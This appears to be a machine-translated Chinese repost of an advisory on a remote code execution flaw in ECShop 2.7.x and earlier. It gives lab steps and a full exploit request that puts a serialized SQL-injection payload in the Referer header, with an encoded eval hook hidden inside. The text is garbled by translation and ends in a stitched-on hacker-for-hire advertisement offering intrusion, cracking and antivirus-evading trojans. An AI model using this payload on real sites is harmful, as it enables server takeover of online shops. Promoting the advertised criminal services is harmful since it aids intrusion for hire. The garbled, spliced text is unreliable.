漏洞预警 | ECShop 全系列版本远程代码执行高危漏洞

2018年9月1日,阿里巴巴云的态势感知发布了预警。最近,ECShop全系列版本的远程执行代码漏洞已被用于增加攻击次数。此漏洞可能直接导致网站服务器崩溃。黑客可以被WEB攻击。直接访问服务器权限...

2018年9月1日,阿里巴巴云的态势感知发布了预警。最近,ECShop全系列版本的远程执行代码漏洞已被用于增加攻击次数。此漏洞可能直接导致网站服务器崩溃。黑客可以被WEB攻击。直接访问服务器权限既简单又有害。因此,阿里云安全专家提醒ECShop系统用户及时进行维修。—— ECShop全方位的远程代码执行高风险漏洞分析 漏洞分析: 预警| ECShop全系列版本的远程代码执行高风险漏洞阿里巴巴云WAF已经能够捍卫 ECShop<=2.7.x全范围的远程代码执行高风险漏洞   在线实验地址: 打开VULNSPY ECSHOP实验室环境   利用 1.单击右上角的START TO HACK按钮创建ECShop实验室环境。

2.创建完成后打开ECSHOP实验地址

3.发送Payload以执行phpinfo(); 将**。vsplate.me替换为您的实验地址* 在终端执行: 卷曲http://***。vsplate.me/user.php -d'action=login& vulnspy=phpinfo();退出;' -H'Referer: 554fcae493e564ee0dc75bdf2ebf94caads | a: 3: {s: 2:'id'; s: 3:''''''/*'; s: 3:'num';小号: 201:' * /联合选择1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,O- - '; S: 4: '姓名'; S: 3: '广告';} 554fcae493e564ee0dc75bdf2ebf94ca “

  参考 预警| ECShop全系列版本的远程代码执行高风险漏洞阿里巴巴云WAF已经能够捍卫 ECShop<=2.7.x全范围的远程代码执行高风险漏洞 本文最初由安全客户发布。作者: VULNSPY
转载,请参阅转载声明,注明来源: https://www.anquanke.com/post/id/158677  黑客业务列表介绍和一般分类: 类别:攻击入侵破解开发 1:攻击业务订单:暂时取消所有此类业务订单[仅销售常规IDC流量] 2:入侵业务清单:包括网站源代码,办公系统,黑色系统,教育系统等。 3:破解业务类:软件,加密文件,二次打包,脱壳等。 4:二次开发业务清单:软件二次开发,源代码二次开发等 5:其他业务订单:特洛伊木马[通过所有防病毒],远程控制,特殊软件等 备注:未提及的业务订单可根据主要类别查询或直接联系客户服务。为避免浪费双方时间,请在咨询前阅读:业务交易流程及相关说明 注意:仅接受正式业务,个人无权接受。收集此内容。